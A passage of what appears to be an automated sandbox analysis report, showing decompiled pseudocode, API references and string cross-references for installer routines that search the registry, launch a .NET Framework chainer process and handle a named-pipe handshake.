                                                                                                                                                                  							L7:
                                                                                                                                                                  							_t145 = E0040465B(_a8,  *((intOrPtr*)(_t140 + 4)),  &_v40, 0);
                                                                                                                                                                  							if(_t145 >= 0) {
                                                                                                                                                                  								_t145 = 0;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to clear variable.");
                                                                                                                                                                  								goto L46;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t145 = E00403A92(_a8,  *((intOrPtr*)(_t140 + 0x20)),  &_v16, 0);
                                                                                                                                                                  						if(_t145 >= 0) {
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Failed to format value string.");
                                                                                                                                                                  							goto L46;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to format key string.");
                                                                                                                                                                  					L46:
                                                                                                                                                                  					_push(_t145);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					if(_t145 < 0) {
                                                                                                                                                                  						L47:
                                                                                                                                                                  						_push(_t145);
                                                                                                                                                                  						E00430F28(2, "RegistrySearchValue failed: ID \'%ls\', HRESULT 0x%x", _v12);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                                                  					E004380AB(_v16);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v20 != 0) {
                                                                                                                                                                  					RegCloseKey(_v20);
                                                                                                                                                                  					_v20 = _v20 & 0x00000000;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t132 != 0) {
                                                                                                                                                                  					E00431137(_t132);
                                                                                                                                                                  				}
                                                                                                                                                                  				E00418E52( &_v40);
                                                                                                                                                                  				return _t145;
                                                                                                                                                                  			}

























                                                                                                                                                                  0x00406491
                                                                                                                                                                  0x0040646d
                                                                                                                                                                  0x0040646d
                                                                                                                                                                  0x00406738
                                                                                                                                                                  0x00406738
                                                                                                                                                                  0x00406739
                                                                                                                                                                  0x00406742
                                                                                                                                                                  0x00406744
                                                                                                                                                                  0x00406744
                                                                                                                                                                  0x0040674f
                                                                                                                                                                  0x00406754
                                                                                                                                                                  0x00406742
                                                                                                                                                                  0x0040675b
                                                                                                                                                                  0x00406760
                                                                                                                                                                  0x00406760
                                                                                                                                                                  0x00406769
                                                                                                                                                                  0x0040676e
                                                                                                                                                                  0x0040676e
                                                                                                                                                                  0x00406777
                                                                                                                                                                  0x0040677c
                                                                                                                                                                  0x00406782
                                                                                                                                                                  0x00406782
                                                                                                                                                                  0x00406788
                                                                                                                                                                  0x0040678b
                                                                                                                                                                  0x0040678b
                                                                                                                                                                  0x00406794
                                                                                                                                                                  0x0040679f

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00406462
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00406488
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,?), ref: 0040677C
                                                                                                                                                                  Strings
                                                                                                                                                                  • search.cpp, xrefs: 00406558, 0040658B, 004065DC, 004066D9
                                                                                                                                                                  • Failed to read registry value., xrefs: 004066FC
                                                                                                                                                                  • Failed to allocate string buffer., xrefs: 0040666D
                                                                                                                                                                  • Failed to clear variable., xrefs: 004064E2
                                                                                                                                                                  • Failed to allocate memory registry value., xrefs: 00406595
                                                                                                                                                                  • Failed to query registry key value., xrefs: 004065E6
                                                                                                                                                                  • Failed to change value type., xrefs: 00406715
                                                                                                                                                                  • Failed to query registry key value size., xrefs: 00406562
                                                                                                                                                                  • Failed to format key string., xrefs: 0040646D
                                                                                                                                                                  • Failed to format value string., xrefs: 00406493
                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00406526
                                                                                                                                                                  • Failed to open registry key., xrefs: 004064F7
                                                                                                                                                                  • Unsupported registry key value type. Type = '%u', xrefs: 0040660E
                                                                                                                                                                  • Failed to set variable., xrefs: 00406733
                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 004064BC
                                                                                                                                                                  • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 00406748
                                                                                                                                                                  • Failed to get expand environment string., xrefs: 004066E3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16$Close
                                                                                                                                                                  • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                                                                  • API String ID: 2348241696-3124384294
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E00424C63(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, DWORD* _a20) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v88;
                                                                                                                                                                  				char _v104;
                                                                                                                                                                  				char _v108;
                                                                                                                                                                  				char _v112;
                                                                                                                                                                  				char _v116;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v120;
                                                                                                                                                                  				signed short _v124;
                                                                                                                                                                  				intOrPtr _v128;
                                                                                                                                                                  				intOrPtr _v132;
                                                                                                                                                                  				struct _PROCESS_INFORMATION _v148;
                                                                                                                                                                  				intOrPtr _v152;
                                                                                                                                                                  				DWORD* _v156;
                                                                                                                                                                  				WCHAR* _v160;
                                                                                                                                                                  				intOrPtr _v164;
                                                                                                                                                                  				void* _v168;
                                                                                                                                                                  				signed int _v172;
                                                                                                                                                                  				signed short _v176;
                                                                                                                                                                  				signed int _v180;
                                                                                                                                                                  				char _v184;
                                                                                                                                                                  				struct _STARTUPINFOW _v252;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t74;
                                                                                                                                                                  				signed int _t85;
                                                                                                                                                                  				signed short _t87;
                                                                                                                                                                  				signed short _t90;
                                                                                                                                                                  				signed short _t101;
                                                                                                                                                                  				signed short _t105;
                                                                                                                                                                  				signed short _t106;
                                                                                                                                                                  				long _t120;
                                                                                                                                                                  				signed short _t124;
                                                                                                                                                                  				signed short _t125;
                                                                                                                                                                  				signed short _t128;
                                                                                                                                                                  				DWORD* _t140;
                                                                                                                                                                  				signed short _t141;
                                                                                                                                                                  				void* _t144;
                                                                                                                                                                  				void* _t148;
                                                                                                                                                                  				signed short _t157;
                                                                                                                                                                  				signed short _t160;
                                                                                                                                                                  				signed short _t163;
                                                                                                                                                                  				signed int _t164;
                                                                                                                                                                  
                                                                                                                                                                  				_t144 = __edx;
                                                                                                                                                                  				_t74 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t74 ^ _t164;
                                                                                                                                                                  				_v160 = _a4;
                                                                                                                                                                  				_v152 = _a8;
                                                                                                                                                                  				_v128 = _a12;
                                                                                                                                                                  				_v132 = _a16;
                                                                                                                                                                  				_v156 = _a20;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t134 = 0;
                                                                                                                                                                  				_v116 = 0;
                                                                                                                                                                  				_v108 = 0;
                                                                                                                                                                  				_v120 = 0;
                                                                                                                                                                  				_v112 = 0;
                                                                                                                                                                  				E004267C0(0, __ecx,  &_v104, 0, __eflags);
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t85 =  &_v104;
                                                                                                                                                                  				_v124 = 0;
                                                                                                                                                                  				__imp__UuidCreate(_t85,  &_v252, 0, 0x44);
                                                                                                                                                                  				if((_t85 | 0x00000001) >= 0) {
                                                                                                                                                                  					_t87 =  &_v104;
                                                                                                                                                                  					__imp__StringFromGUID2(_t87,  &_v88, 0x27);
                                                                                                                                                                  					__eflags = _t87;
                                                                                                                                                                  					if(_t87 != 0) {
                                                                                                                                                                  						_t90 = E00433CEA( &_v108, L"NetFxSection.%ls",  &_v88);
                                                                                                                                                                  						__eflags = _t90;
                                                                                                                                                                  						if(_t90 >= 0) {
                                                                                                                                                                  							__eflags = E00433CEA( &_v116, L"NetFxEvent.%ls",  &_v88);
                                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                                  								_t154 = E0042465F(0, __ecx, __eflags, _v108, _v116,  &_v112);
                                                                                                                                                                  								__eflags = _t154;
                                                                                                                                                                  								if(_t154 >= 0) {
                                                                                                                                                                  									_push(_v108);
                                                                                                                                                                  									_t154 = E00433CEA( &_v120, L"%ls /pipe %ls", _v152);
                                                                                                                                                                  									__eflags = _t154;
                                                                                                                                                                  									if(_t154 >= 0) {
                                                                                                                                                                  										_t147 = _v160;
                                                                                                                                                                  										_v252.cb = 0x44;
                                                                                                                                                                  										_t101 = CreateProcessW(_v160, _v120, 0, 0, 0, 0x8000000, 0, 0,  &_v252,  &_v148);
                                                                                                                                                                  										__eflags = _t101;
                                                                                                                                                                  										if(_t101 != 0) {
                                                                                                                                                                  											_t134 = _v112;
                                                                                                                                                                  											_t147 = WaitForMultipleObjects;
                                                                                                                                                                  											_v168 = _v148.hProcess;
                                                                                                                                                                  											_v164 =  *((intOrPtr*)(_v112 + 4));
                                                                                                                                                                  											while(1) {
                                                                                                                                                                  												_t105 = WaitForMultipleObjects(2,  &_v168, 0, 0x64);
                                                                                                                                                                  												__eflags = _t105;
                                                                                                                                                                  												if(_t105 == 0) {
                                                                                                                                                                  													break;
                                                                                                                                                                  												}
                                                                                                                                                                  												__eflags = _t105 - 1;
                                                                                                                                                                  												if(_t105 != 1) {
                                                                                                                                                                  													__eflags = _t105 - 0xffffffff;
                                                                                                                                                                  													if(_t105 == 0xffffffff) {
                                                                                                                                                                  														_t106 = GetLastError();
                                                                                                                                                                  														__eflags = _t106;
                                                                                                                                                                  														_t157 =  <=  ? _t106 : _t106 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														__eflags = _t157;
                                                                                                                                                                  														_t154 =  >=  ? 0x80004005 : _t157;
                                                                                                                                                                  														E004300D9(0x80004005, "NetFxChainer.cpp", 0x1ab, _t154);
                                                                                                                                                                  														_push("Failed to wait for netfx chainer process to complete");
                                                                                                                                                                  														L20:
                                                                                                                                                                  														_push(_t154);
                                                                                                                                                                  														E00430A57();
                                                                                                                                                                  														L29:
                                                                                                                                                                  														if(_v108 != 0) {
                                                                                                                                                                  															E004380AB(_v108);
                                                                                                                                                                  														}
                                                                                                                                                                  														if(_v116 != 0) {
                                                                                                                                                                  															E004380AB(_v116);
                                                                                                                                                                  														}
                                                                                                                                                                  														if(_v120 != 0) {
                                                                                                                                                                  															E004380AB(_v120);
                                                                                                                                                                  														}
                                                                                                                                                                  														E0042492E(_t134, _t147, _t134);
                                                                                                                                                                  														_t148 = CloseHandle;
                                                                                                                                                                  														if(_v148.hThread != 0) {
                                                                                                                                                                  															CloseHandle(_v148.hThread);
                                                                                                                                                                  															_v148.hThread = _v148.hThread & 0x00000000;
                                                                                                                                                                  														}
                                                                                                                                                                  														if(_v148.hProcess != 0) {
                                                                                                                                                                  															CloseHandle(_v148.hProcess);
                                                                                                                                                                  														}
                                                                                                                                                                  														return L004267AF(_t154, _v8 ^ _t164, _t148, _t154);
                                                                                                                                                                  													}
                                                                                                                                                                  													continue;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t154 = E00424B60(_t144, _t134, _v128, _v132);
                                                                                                                                                                  												__eflags = _t154;
                                                                                                                                                                  												if(_t154 >= 0) {
                                                                                                                                                                  													continue;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to process netfx chainer message.");
                                                                                                                                                                  												goto L20;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t120 = E00424A32(_t134,  &_v124);
                                                                                                                                                                  											_t140 = _v156;
                                                                                                                                                                  											 *_t140 = _t120;
                                                                                                                                                                  											__eflags = _t120 - 0x8000000a;
                                                                                                                                                                  											if(_t120 != 0x8000000a) {
                                                                                                                                                                  												_t141 = _v124;
                                                                                                                                                                  												__eflags = _t141;
                                                                                                                                                                  												if(_t141 < 0) {
                                                                                                                                                                  													_t147 =  &_v184;
                                                                                                                                                                  													asm("stosd");
                                                                                                                                                                  													asm("stosd");
                                                                                                                                                                  													asm("stosd");
                                                                                                                                                                  													asm("stosd");
                                                                                                                                                                  													_v180 = _v180 & 0x00000000;
                                                                                                                                                                  													_t55 =  &_v172;
                                                                                                                                                                  													 *_t55 = _v172 & 0x00000000;
                                                                                                                                                                  													__eflags =  *_t55;
                                                                                                                                                                  													_v184 = 1;
                                                                                                                                                                  													_v176 = _t141;
                                                                                                                                                                  													_v128( &_v184, _v132);
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L29;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t124 = GetExitCodeProcess(_v148, _t140);
                                                                                                                                                                  											__eflags = _t124;
                                                                                                                                                                  											if(_t124 != 0) {
                                                                                                                                                                  												goto L29;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t125 = GetLastError();
                                                                                                                                                                  											__eflags = _t125;
                                                                                                                                                                  											_t160 =  <=  ? _t125 : _t125 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											__eflags = _t160;
                                                                                                                                                                  											_t154 =  >=  ? 0x80004005 : _t160;
                                                                                                                                                                  											E004300D9(0x80004005, "NetFxChainer.cpp", 0x197, _t154);
                                                                                                                                                                  											_push("Failed to get netfx return code.");
                                                                                                                                                                  											goto L20;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t128 = GetLastError();
                                                                                                                                                                  										__eflags = _t128;
                                                                                                                                                                  										_t163 =  <=  ? _t128 : _t128 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										__eflags = _t163;
                                                                                                                                                                  										_t154 =  >=  ? 0x80004005 : _t163;
                                                                                                                                                                  										E004300D9(0x80004005, "NetFxChainer.cpp", 0x187,  >=  ? 0x80004005 : _t163);
                                                                                                                                                                  										E00430A57( >=  ? 0x80004005 : _t163, "Failed to CreateProcess on path: %ls", _t147);
                                                                                                                                                                  										L15:
                                                                                                                                                                  										_t134 = _v112;
                                                                                                                                                                  										goto L29;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to allocate netfx chainer arguments.");
                                                                                                                                                                  									L12:
                                                                                                                                                                  									_push(_t154);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  									goto L15;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push("Failed to create netfx chainer.");
                                                                                                                                                                  								goto L12;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to allocate event name.");
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to allocate section name.");
                                                                                                                                                                  						goto L20;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t154 = 0x8007000e;
                                                                                                                                                                  					E004300D9(_t87, "NetFxChainer.cpp", 0x175, 0x8007000e);
                                                                                                                                                                  					_push("Failed to convert netfx chainer guid into string.");
                                                                                                                                                                  					goto L20;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("Failed to create netfx chainer guid.");
                                                                                                                                                                  				goto L20;
                                                                                                                                                                  			}














































                                                                                                                                                                  0x00424e40
                                                                                                                                                                  0x00424e43
                                                                                                                                                                  0x00424e49
                                                                                                                                                                  0x00424e52
                                                                                                                                                                  0x00424e88
                                                                                                                                                                  0x00424e95
                                                                                                                                                                  0x00424e97
                                                                                                                                                                  0x00424e99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e5a
                                                                                                                                                                  0x00424e5d
                                                                                                                                                                  0x00424e83
                                                                                                                                                                  0x00424e86
                                                                                                                                                                  0x00424f05
                                                                                                                                                                  0x00424f14
                                                                                                                                                                  0x00424f16
                                                                                                                                                                  0x00424f1e
                                                                                                                                                                  0x00424f20
                                                                                                                                                                  0x00424f2e
                                                                                                                                                                  0x00424f33
                                                                                                                                                                  0x00424e76
                                                                                                                                                                  0x00424e76
                                                                                                                                                                  0x00424e77
                                                                                                                                                                  0x00424f7b
                                                                                                                                                                  0x00424f7f
                                                                                                                                                                  0x00424f84
                                                                                                                                                                  0x00424f84
                                                                                                                                                                  0x00424f8d
                                                                                                                                                                  0x00424f92
                                                                                                                                                                  0x00424f92
                                                                                                                                                                  0x00424f9b
                                                                                                                                                                  0x00424fa0
                                                                                                                                                                  0x00424fa0
                                                                                                                                                                  0x00424fa6
                                                                                                                                                                  0x00424fb2
                                                                                                                                                                  0x00424fb8
                                                                                                                                                                  0x00424fc0
                                                                                                                                                                  0x00424fc2
                                                                                                                                                                  0x00424fc2
                                                                                                                                                                  0x00424fd0
                                                                                                                                                                  0x00424fd8
                                                                                                                                                                  0x00424fd8
                                                                                                                                                                  0x00424fea
                                                                                                                                                                  0x00424fea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e86
                                                                                                                                                                  0x00424e6b
                                                                                                                                                                  0x00424e6d
                                                                                                                                                                  0x00424e6f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e71
                                                                                                                                                                  0x00424ea0
                                                                                                                                                                  0x00424ea5
                                                                                                                                                                  0x00424eab
                                                                                                                                                                  0x00424ead
                                                                                                                                                                  0x00424eb2
                                                                                                                                                                  0x00424f3d
                                                                                                                                                                  0x00424f40
                                                                                                                                                                  0x00424f42
                                                                                                                                                                  0x00424f49
                                                                                                                                                                  0x00424f4f
                                                                                                                                                                  0x00424f50
                                                                                                                                                                  0x00424f51
                                                                                                                                                                  0x00424f52
                                                                                                                                                                  0x00424f53
                                                                                                                                                                  0x00424f5a
                                                                                                                                                                  0x00424f5a
                                                                                                                                                                  0x00424f5a
                                                                                                                                                                  0x00424f68
                                                                                                                                                                  0x00424f72
                                                                                                                                                                  0x00424f78
                                                                                                                                                                  0x00424f78
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424f42
                                                                                                                                                                  0x00424ebf
                                                                                                                                                                  0x00424ec5
                                                                                                                                                                  0x00424ec7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424ecd
                                                                                                                                                                  0x00424edc
                                                                                                                                                                  0x00424ede
                                                                                                                                                                  0x00424ee6
                                                                                                                                                                  0x00424ee8
                                                                                                                                                                  0x00424ef6
                                                                                                                                                                  0x00424efb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424efb
                                                                                                                                                                  0x00424df5
                                                                                                                                                                  0x00424e04
                                                                                                                                                                  0x00424e06
                                                                                                                                                                  0x00424e0e
                                                                                                                                                                  0x00424e10
                                                                                                                                                                  0x00424e1e
                                                                                                                                                                  0x00424e2a
                                                                                                                                                                  0x00424e32
                                                                                                                                                                  0x00424e32
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424e32
                                                                                                                                                                  0x00424dae
                                                                                                                                                                  0x00424db3
                                                                                                                                                                  0x00424db3
                                                                                                                                                                  0x00424db4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424dba
                                                                                                                                                                  0x00424d87
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424d87
                                                                                                                                                                  0x00424d68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424d68
                                                                                                                                                                  0x00424d43
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424d43
                                                                                                                                                                  0x00424d09
                                                                                                                                                                  0x00424d19
                                                                                                                                                                  0x00424d1e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424d1e
                                                                                                                                                                  0x00424ceb
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00424CDE
                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 00424CFF
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 00424E95
                                                                                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 00424EBF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00424ECD
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00424F05
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,NetFxChainer.cpp,000001AB,00000000,?,?,?,?), ref: 00424FC0
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,NetFxChainer.cpp,000001AB,00000000,?,?,?,?), ref: 00424FD8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to convert netfx chainer guid into string., xrefs: 00424D1E
                                                                                                                                                                  • NetFxSection.%ls, xrefs: 00424D2F
                                                                                                                                                                  • Failed to create netfx chainer., xrefs: 00424D87
                                                                                                                                                                  • Failed to create netfx chainer guid., xrefs: 00424CEB
                                                                                                                                                                  • Failed to allocate netfx chainer arguments., xrefs: 00424DAE
                                                                                                                                                                  • Failed to allocate event name., xrefs: 00424D68
                                                                                                                                                                  • Failed to process netfx chainer message., xrefs: 00424E71
                                                                                                                                                                  • Failed to wait for netfx chainer process to complete, xrefs: 00424F33
                                                                                                                                                                  • D, xrefs: 00424DE0
                                                                                                                                                                  • %ls /pipe %ls, xrefs: 00424D9A
                                                                                                                                                                  • NetFxChainer.cpp, xrefs: 00424D14, 00424E19, 00424EF1, 00424F29
                                                                                                                                                                  • NetFxEvent.%ls, xrefs: 00424D54
                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 00424E24
                                                                                                                                                                  • Failed to allocate section name., xrefs: 00424D43
                                                                                                                                                                  • Failed to get netfx return code., xrefs: 00424EFB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorHandleLast$CodeCreateExitFromMultipleObjectsProcessStringUuidWait
                                                                                                                                                                  • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                                                                  • API String ID: 454750362-1825855094
                                                                                                                                                                  • Opcode ID: a57de1181b58bdda0f1c6591c98084430fa2e4931438abaadfd89eb2da5ea3b2
                                                                                                                                                                  • Instruction ID: 1eb0f61384c4fa649436f4f89bfd7dcd9db128c7bd832b35c197359962eda6aa
                                                                                                                                                                  • Opcode Fuzzy Hash: a57de1181b58bdda0f1c6591c98084430fa2e4931438abaadfd89eb2da5ea3b2
                                                                                                                                                                  • Instruction Fuzzy Hash: D4A1A171E40228AFEB20DBB5DC45BAEB6B8EF48714F11016BE908F7251D7788D418F99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E0040F9DC(long _a4) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				void _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				void _v28;
                                                                                                                                                                  				void _v32;
                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                  				WCHAR* _t40;
                                                                                                                                                                  				long _t43;
                                                                                                                                                                  				signed int _t44;
                                                                                                                                                                  				signed short _t48;
                                                                                                                                                                  				signed short _t56;
                                                                                                                                                                  				signed short _t62;
                                                                                                                                                                  				signed short _t67;
                                                                                                                                                                  				signed short _t73;
                                                                                                                                                                  				signed short _t79;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  				long _t84;
                                                                                                                                                                  				signed int _t88;
                                                                                                                                                                  				void* _t109;
                                                                                                                                                                  
                                                                                                                                                                  				_t84 = _a4;
                                                                                                                                                                  				_v40 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                  				_v36 =  *((intOrPtr*)(_t84 + 0x14));
                                                                                                                                                                  				_t40 =  *(_t84 + 4);
                                                                                                                                                                  				_t88 = 0;
                                                                                                                                                                  				_v24 = _t40;
                                                                                                                                                                  				_v16 = lstrlenW(_t40) + _t41;
                                                                                                                                                                  				_t43 = GetCurrentProcessId();
                                                                                                                                                                  				_v32 = _v32 & 0;
                                                                                                                                                                  				_a4 = _a4 & 0;
                                                                                                                                                                  				_v28 = _t43;
                                                                                                                                                                  				_t44 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					_t83 =  *(_t109 + _t44 * 4 - 0x24);
                                                                                                                                                                  					if(_t83 == 0xffffffff) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v8 = 1;
                                                                                                                                                                  					if(SetNamedPipeHandleState(_t83,  &_v8, 0, 0) == 0) {
                                                                                                                                                                  						_t48 = GetLastError();
                                                                                                                                                                  						_t91 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t88 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "pipe.cpp", 0x1d6, _t88);
                                                                                                                                                                  						_push("Failed to set pipe to non-blocking.");
                                                                                                                                                                  						goto L28;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v12 = _v12 & 0x00000000;
                                                                                                                                                                  						do {
                                                                                                                                                                  							if(ConnectNamedPipe(_t83, 0) != 0) {
                                                                                                                                                                  								goto L9;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t52 = GetLastError();
                                                                                                                                                                  								if(_t52 == 0x217) {
                                                                                                                                                                  									_t88 = 0;
                                                                                                                                                                  									L11:
                                                                                                                                                                  									_v8 = _v8 & 0x00000000;
                                                                                                                                                                  									if(SetNamedPipeHandleState(_t83,  &_v8, 0, 0) == 0) {
                                                                                                                                                                  										_t56 = GetLastError();
                                                                                                                                                                  										_t94 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t88 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										E004300D9(0x80004005, "pipe.cpp", 0x201, _t88);
                                                                                                                                                                  										_push("Failed to reset pipe to blocking.");
                                                                                                                                                                  										goto L28;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										if(WriteFile(_t83,  &_v16, 4,  &_a4, 0) == 0) {
                                                                                                                                                                  											_t62 = GetLastError();
                                                                                                                                                                  											_t97 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_t88 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											E004300D9(0x80004005, "pipe.cpp", 0x207, _t88);
                                                                                                                                                                  											_push("Failed to write secret length to pipe.");
                                                                                                                                                                  											goto L28;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											if(WriteFile(_t83, _v24, _v16,  &_a4, 0) == 0) {
                                                                                                                                                                  												_t67 = GetLastError();
                                                                                                                                                                  												_t100 =  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												_t88 =  >=  ? 0x80004005 :  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
